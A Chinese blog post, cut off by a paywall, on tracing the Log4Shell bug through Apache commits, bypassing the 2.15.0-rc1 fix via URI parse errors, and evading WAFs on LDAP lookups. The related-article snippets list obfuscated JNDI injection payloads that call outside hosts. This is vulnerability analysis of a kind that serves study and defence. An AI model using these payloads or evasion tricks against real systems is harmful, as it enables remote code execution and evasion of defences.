如何跟踪log4j漏洞原理及发现绕WAF的tips

最新推荐文章于 2024-04-15 13:57:37 发布
最新推荐文章于 2024-04-15 13:57:37 发布
阅读量1.8k 收藏 5
点赞数 3
分类专栏: 漏洞 安全 黑客 文章标签: 安全 web安全 网络安全 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/HBohan/article/details/122060293
版权
本文详细介绍了Log4j漏洞的形成原因,包括官方GitHub上的关键commit,以及如何跟进漏洞产生原理。此外,还分享了如何绕过2.15.0-rc1版本的防护,分析了URI解析过程,并提供了针对WAF的LDAP绕过提示,如IP包裹、避免特定关键字等。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

log4j漏洞的形成原因已经有很多分析文章了,这里说一说我是如何在了解到有漏洞后,跟进漏洞产生原理的,以及发现的一些绕WAF tips

跟进漏洞产生原因的思路

如何发现漏洞产生原因的

了解到log4j <=2.14.1 存在RCE的情况,我马上跑到其官方github看了一下,发现commit记录中有两个关键commit
在这里插入图片描述

  • 第一,log4j不再自动对消息中的lookup进行格式化,第一时间看到不是很懂
  • 第二,限制JNDI默认支持,限制通过LDAP访问服务器和类

这两个点很容易联想到是不是跟JNDI攻击有关系,毕竟RMI和LDAP很容易做到RCE。跟进commit看看具体的修改情况,https://github.com/apache/logging-log4j2/commit/d82b47c6fae9c15fcb183170394d5f1a01ac02d3 这个commit中,对org.apache.logging.log4j.core.net.JndiManager.java进行了大量修改,特别是在lookup方法中,加了很多代码

【私信回复“资料”获取log4j的复现/修复教程】点击查看网络安全学习攻略

在这里插入图片描述
仔细看了一下,没有修改前,lookup方法直接通过this.context.lookup(name)执行JNDI操作,没有任何过滤或者限制,而新增加的代码在限制JNDI服务器、类。当天晚上看到payload后,马上对log4j 2.14.1版本尝试验证一下,并在JndiManager#lookup方法中断点看到如下
在这里插入图片描述
很明显,name就是payload中给定的,仔细看一下调用栈就可以发现,log4j会对字符串中的${}自动解析,也就是前面提到的commit备注信息中写到的。

如何绕过2.15.0-rc1版本

看到rc1版本存在绕过的消息,又来看看官方github仓库的commit记录,里面有一条在更新到2.15.0-rc1版本后的commit记录,提交的信息是"handle URI exception",即处理了URI出错的情况。修改代码情况如下图
在这里插入图片描述
JndiManager#lookup方法处给catch语句中添加了两行代码,记录URI解析错误并返回null。而添加这两行代码前,此处只有一行注释,因此catch报错后会继续向下执行this.context.lookup,也就意味着前面try语句中的代码报错后,会继续执行JNDI操作,绕过也就来自于这里。

来看看try语句是什么写的
在这里插入图片描述
代码比较长没有完全截进来,关键点是进入lookup方法后,立即将name变量送入URI类的构造函数中,此时只要URI的构造函数对name字符串解析出错,即可跳转到catch语句,进而向下执行到JNDI操作。

那么我们要关注的点就是让new URI(name)处报错,但是name又能被jndi正常识别。好在我们用marshalsec构造ldap服务时,不需要关心uri长什么样,所以可以在uri上做文章。

跟踪源代码可以查看到URI对字符的支持情况
在这里插入图片描述
数字、字母大小写这些就不说了,其它可打印字符也不多,从上面的注释中可以看到URI对反引号`,空格,尖括号<>并不支持,基于这一点,可以做个简单的实验
在这里插入图片描述
空格和尖括号同样报错,就不重复截图了。回到前面提到的2.15.0-rc1版本对JndiManager#lookup方法的修复情况,并没有在catch语句中添加返回操作或报错,程序遇到报错后,会继续向下执行,从而造成危险。

由于找了很久都没有找到log4j-core-2.15.0-rc1.jar这个包,所以自己写了个函数模拟一下绕过的场景
在这里插入图片描述

LDAP绕WAF的tips

URI解析

看完rc1版本的绕过后,又想了一下,防御工具可能会有针对性的做一些关键字检测,所以我打算从LDAP更深层的源代码看看有没有对字符串变形的可能性。

跟着this.context.lookup(name)处向下跟进到com.sun.jndi.url.ldap.LdapURLContextFactory#getUsingURLIgnoreRootDN方法,代码如下
在这里插入图片描述
注意var0也就是输入是完整的"ldap://192.168.34.96:1389:/a",而后var2可以使用getHost和getPort方法获取host和port,说明var2对象在创建时解析了ldap地址。跟进LdapURL类到达Uri#parse方法

  • com.sun.jndi.toolkit.url.Uri#parse
private void parse(String var1) throws MalformedURLException {
   
    int var2 = var1.indexOf(58);
    if (var2 < 0) {
   
        throw new MalformedURLException("Invalid URI: " + var1);
    } else {
   
        this.scheme = var1.substring(0, var2);
        ++var2;
        this.hasAuthority = var1.startsWith("//", var2);
        int var3;
        if (this.hasAuthority) {
   
            var2 += 2;
            var3 = var1.indexOf(
最低0.47元/天 解锁文章
网络攻防中黑客常用技术跨站脚本技术:DOM XSS高发场景透视及修复技巧、取值写入页面或动态执行、使用HTML5 postMessage进行跨域通讯、使用存在缺陷的第三方库或通用组件
代码讲故事
03-08 514
网络攻防中黑客常用技术跨站脚本技术:DOM XSS高发场景透视及修复技巧、取值写入页面或动态执行、使用HTML5 postMessage进行跨域通讯、使用存在缺陷的第三方库或通用组件。 DOM-Based XSS是一种基于文档对象模型(Document Object Model,DOM)的Web前端漏洞,简单来说就是JavaScript代码缺陷造成的漏洞。与普通XSS不同的是,DOM XSS是在浏览器的解析中改变页面DOM树,且恶意代码并不在返回页面源码中回显,这使我们无法通过特征匹配来检测DOM XSS
网络攻防中的黑客常用技巧:可回显注入、盲注查询、报错注入、写exe,dll文件提权、类型隐式转换、sqlmap tips、SqlMap绕过WAF实例、自定义payload脚本、自定义bypass脚本等
代码讲故事
03-20 375
网络攻防中的黑客常用技巧:可回显注入、盲注查询、报错注入、写exe,dll文件提权、类型隐式转换、sqlmap tips、SqlMap绕过WAF实例、自定义payload脚本、自定义bypass脚本等。
Log4j远程代码执行漏洞,通过 WAF 防护
Yuri_cyber的博客
12-30 2817
12月10日,Apache Log4j 的远程代码执行漏洞(CVE-2021-44228)引发了 Web 应用安全界的震动。Akamai 全球安全服务中心和本地的安全服务团队及时响应了这次安全事件,在很多硬件 WAF 厂家还忙于升级补丁和规则的时候,Akamai 的云端防护引擎已经为客户防御了安全攻击,给客户争取更多的时间去升级系统。 影响范围 作为一款开源的日志记录工具,Apache Log4j 已被包含在众多流行的框架中(包括但不限于 Apache Struts2、Apa...
Log4j漏洞原理
2301_76786857的博客
12-25 1132
当日志中包含${}时,log4j会将表达式的内容替换成真实的内容(即lookup接口查找得到的内容)。使用LDAP或RMI协议,能从远程服务区上请求恶意的对象,对象在调用的过程中会被解析执行,导致了log4j漏洞log4j漏洞主要是由于其提供的lookup功能下的JndiLookup模块出现问题所导致的。当开发人员在处理数据时,并没有对用户输入的信息进行判断,导致Log4j请求远程主机上的含有恶意代码的资源并执行其中的代码,从而造成远程代码执行漏洞
Log4j漏洞原理及修复
o0way0o的博客
01-01 3290
*JNDI(Java Naming and Directory Interface–Java)**命名和目录接口 是Java中为命名和目录服务提供接口的API,通过名字可知道,JNDI主要由两部分组成:Naming(命名)和Directory(目录),其中Naming是指将对象通过唯一标识符绑定到一个上下文Context,同时可通过唯一标识符查找获得对象,而Directory主要指将某一对象的属性绑定到Directory的上下文DirContext中,同时可通过名字获取对象的属性同时操作属性。
Apache Log4j漏洞的本质及实现原理
阿里渣渣java研发组-群主
01-16 1772
log4j远程代码漏洞问题被大范围曝光后已经有一段时间了。 很多人只能看到一个“弹出一个计算器”的演示,于是内心想着“哦,就是执行任意代码,启动个计算器”,却对这个漏洞原理不甚了解。 而对于java开发应用不是非常深的同学来讲,jndi、rmi更是很陌生的名词。 这里会以不断提问的方式,逐步推进这个问题的解答,一步步揭开这个漏洞的本质,并给出对这个漏洞的思考。...
Web网络安全-----Log4j高危漏洞原理及修复
热门推荐
qq_51690690的博客
07-27 1万+
Log4j 即 log for java(java的日志) ,是Apache的一个开源项目,通过使用Log4j,我们可以控制日志信息输送的目的地是控制台、文件、GUI组件,甚至是套接口服务器、NT的事件记录器、UNIX Syslog守护进程等;我们也可以控制每一条日志的输出格式;通过定义每一条日志信息的级别,我们能够更加细致地控制日志的生成过程。最令人感兴趣的就是,这些可以通过一个配置文件来灵活地进行配置,而不需要修改应用的代码。提示:以下是本篇文章正文内容,下面案例可供参考。
蓝队面试知识点整理
qq_32350719的博客
05-07 8879
蓝队面试知识点整理
渗透测试 ( 5 ) --- 扫描之王 nmap、渗透测试工具实战技巧合集
墨鱼菜鸡
07-11 6109
Nmap 官方文档 ( 中文文档是 Nmap 版本4.50,英文文档是最新的): 英文文档:https://nmap.org/book/man.html中文文档:https://nmap.org/man/zh/index.html#man-description官方 Nmap 项目指南:https://nmap.org/book/toc.html ...
漏洞跟踪系统
cnbird's blog
09-24 787
http://www.bugzilla.org/
Log4j史诗级漏洞,从原理到实战,只用3个实例讲明白
程序新视界
12-13 1万+
背景 最近互联网技术圈最火的一件事莫过于Log4j2漏洞了。同时也涌现出了各类分析文章,关于漏洞的版本、漏洞的原因、漏洞的修复、程序员因此加班等等。 经常看我文章的朋友都知道,面对这样热门有意思的技术点,怎能错过深入分析一波呢?大概你也已经听说了,造成漏洞的”罪魁祸首“是JNDI,今天我们就聊它。 JNDI,好熟悉,但……熟悉的陌生人?JNDI到底是个什么鬼?好吧,如果你已经有一两年的编程经验,但还不了解JNDI,甚至没听说过。那么,要么赶紧换工作,要么赶紧读读这篇文章。 JNDI是个什么鬼? 说起JND
不亲手体验Log4j漏洞怎么知道恐怖
醉鱼的博客
12-15 327
原文链接:(环境搭建+复现)CVE-2021-44228 Apache Log4j 远程代码执行漏洞_daxi0ng的博客-优快云博客_log4j漏洞复现 *0x00 简介* ApacheLog4j2是一个开源的Java日志框架,被广泛地应用在中间件、开发框架与Web应用中。 *0x01 漏洞概述* 该漏洞是由于Apache Log4j2某些功能存在递归解析功能,未经身份验证的攻击者通过发送特定恶意数据包,可在目标服务器上执行任意代码。 0x02 影响范围 Apache Log4j 2...
WEB安全Log4j Bypass WAF Payloads
qq_42322144的博客
12-14 6138
Log4j Bypass WAF Payloads ${jndi:ldap://127.0.0.1:1389/ badClassName} ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit} ${${::-j}ndi:rmi://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit} ${jndi:rmi:
Apache log4j核弹级漏洞,一篇完全理解漏洞原因
Java码农杂谈
12-15 4591
2021年12月9日,Log4j组件发生了核弹级别的安全漏洞。作为Java语言程序最普遍使用的组件之一,该次漏洞影响覆盖面之广堪比核弹爆炸;漏洞影响力的大小,从被大家戏称为Log4Shell就可以看出危害之大! 相信圈内的人基本都听到了该消息,也和我一样想弄清楚漏洞究竟是怎么发生的?漏洞的影响范围?能带来什么危害?漏洞原理是什么? 12月10日,Apache官方也是披露了漏洞的相关详细信息。带着疑问了解了相关信息,分享给大家。 一、漏洞的影响范围? 程序中使用了Apache Log4j 2.x <=
log4j RCE waf 绕过技巧
weixin_50464560的博客
07-09 1937
log4j waf 绕过技巧 - ph4nt0mer - 博客园 (cnblogs.com)原来的poc: Copy绕过的poc: Copy可行 Copy不一定可行 Copy可行unico字符串下列表达式均等价于abc: Copylog4j poc集合 https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell/rapid7-analysis● 不出现port,避免被waf匹配ip:port Copy
关于漏洞追踪的五项原则
akacd的专栏
12-29 2798
远程工作的团队相比同坐在一个办公室工作的团队需要更好地纪律性,沟通的纪律性。过去的五年,我们远程地在teamed.io开发软件。我们使用漏洞追踪工具(如Github, JIRA, Trac, Basecamp等)。我们不鼓励里斯爱里面通过如Skype,HipChat,电子邮件或者电话来沟通问题。对我们来说每一个漏洞都有一个生命周期,自己的参与者,和自己的目标。这么多年来,我们积累了很多经验想
log4j RCE漏洞原理分析及检测_log4j 漏洞监测,网络安全开发基础学习
2401_83621004的博客
04-15 804
漏洞检测时,可以使用 ${jndi:ldap://http://xxx.dnslog.cn} ,如果攻击成功,目标服务器将会从 xxx.dnslog.cn 下载jndi字节流,下载之前首先得连接dnslog.cn进行xxx.dnslog.cn的域名解析,获得真实ip地址。dnslog.cn 是安全检测常用工具之一,在其主页上点击 Get SubDomain 即可以自动生成一个 dnslog.cn 的子域名,这个子域名解析出来的ip是 127.0.0.1,也就是本机地址。因篇幅有限,仅展示部分资料。
log4j漏洞原理分析&复现&检测&复盘
qq_43665434的博客
08-22 3123
log4j漏洞原理分析&复现&检测&复盘
Apache Log4j2(CVE-2021-4101)远程代码执行漏洞复现
今天是几号的博客
04-12 3330
Apache log4j是Apache的一个开源项目,Java的日志记录工具(同logback)。log4j2中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞。 影响范围 Apache Log4j 2.x
log4j2漏洞
最新发布
03-10
嗯,用户想了解Log4j2漏洞的详情及解决方案。首先,我需要回忆一下Log4j2漏洞的基本情况。这个漏洞应该是指Log4Shell,也就是CVE-2021-44228吧。这个漏洞影响很大,因为攻击者可以通过日志记录中的JNDI注入来执行...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值